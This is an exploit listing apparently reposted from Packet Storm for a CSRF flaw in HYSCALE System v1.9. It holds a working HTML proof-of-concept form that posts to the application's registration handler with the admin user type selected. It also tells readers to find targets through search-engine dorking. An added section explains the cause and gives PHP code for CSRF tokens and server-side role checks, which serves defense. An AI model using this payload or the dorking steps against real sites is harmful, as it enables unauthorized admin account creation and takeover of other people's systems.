## https://sploitus.com/exploit?id=PACKETSTORM:181597
=============================================================================================================================================  
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] This HTML page is designed to remotely add a new admin.  
  
[+] Line 10 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Registration Form</title>  
</head>  
<body>  
  
<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">  
  
<label for="username">Username:</label>  
<input type="text" name="username" id="username" required><br><br>  
  
<label for="email">Email:</label>  
<input type="email" name="email" id="email" required><br><br>  
  
<label for="password">Password:</label>  
<input type="password" name="password" id="password" required><br><br>  
  
<label for="dob">Date of Birth:</label>  
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>  
  
<label>Gender:</label><br>  
<input type="radio" name="gender" value="Male" id="male" required>  
<label for="male">Male</label><br>  
<input type="radio" name="gender" value="Female" id="female">  
<label for="female">Female</label><br><br>  
  
<label for="usertype">User Type:</label>  
<select name="usertype" id="usertype" required>  
<option value="admin">Admin</option>  
<option value="user">User</option>  
<option value="guest">Guest</option>  
</select><br><br>  
  
<label for="target_sales">Target Sales:</label>  
<input type="text" name="target_sales" id="target_sales" required><br><br>  
  
<input type="submit" value="Submit">  
  
</form>  
  
</body>  
</html>  
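
The PoC works because the handler accepts a cross-site POST and trusts the posted usertype value. The sketch below is an added example, not code from the advisory or from the HYSCALE project, showing the two server-side checks that stop it: a per-session CSRF token and a role decided by the server. The field names come from the PoC form; the csrf_token field, the session layout and all function names are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not the application's code. Field names (usertype, ...) come from
// the PoC form; csrf_token, the session layout and all function names are assumptions.

const ALLOWED_ROLES = ['admin', 'user', 'guest'];

// Issue a per-session token to embed as a hidden field in the real form.
function issue_csrf_token(array &$session): string
{
    $session['csrf'] = bin2hex(random_bytes(32));
    return $session['csrf'];
}

// True only when the posted token matches the session token (constant-time compare).
function csrf_ok(array $session, array $post): bool
{
    $expected = $session['csrf'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// The posted usertype is honoured only for a logged-in admin; otherwise 'user'.
function resolve_role(array $session, array $post): string
{
    $requested = $post['usertype'] ?? 'user';
    $isAdmin = ($session['role'] ?? null) === 'admin';
    return ($isAdmin && in_array($requested, ALLOWED_ROLES, true)) ? $requested : 'user';
}

// Returns [HTTP status, role granted or null] for a registration POST.
function handle_registration(array $session, array $post): array
{
    if (!csrf_ok($session, $post)) {
        return [403, null]; // a cross-site form cannot supply the session's token
    }
    return [200, resolve_role($session, $post)];
}

// Constructed sample requests (not captured traffic).
$admin = ['role' => 'admin'];
$adminToken = issue_csrf_token($admin);
$anon = [];
$anonToken = issue_csrf_token($anon);
$forged = ['username' => 'demo', 'usertype' => 'admin']; // shaped like the PoC POST

var_dump(handle_registration($admin, $forged));
var_dump(handle_registration($admin, $forged + ['csrf_token' => $adminToken]));
var_dump(handle_registration($anon, $forged + ['csrf_token' => $anonToken]));
```

Setting the session cookie's SameSite attribute to Lax or Strict adds a second layer, since browsers then withhold the cookie on cross-site POSTs.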
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================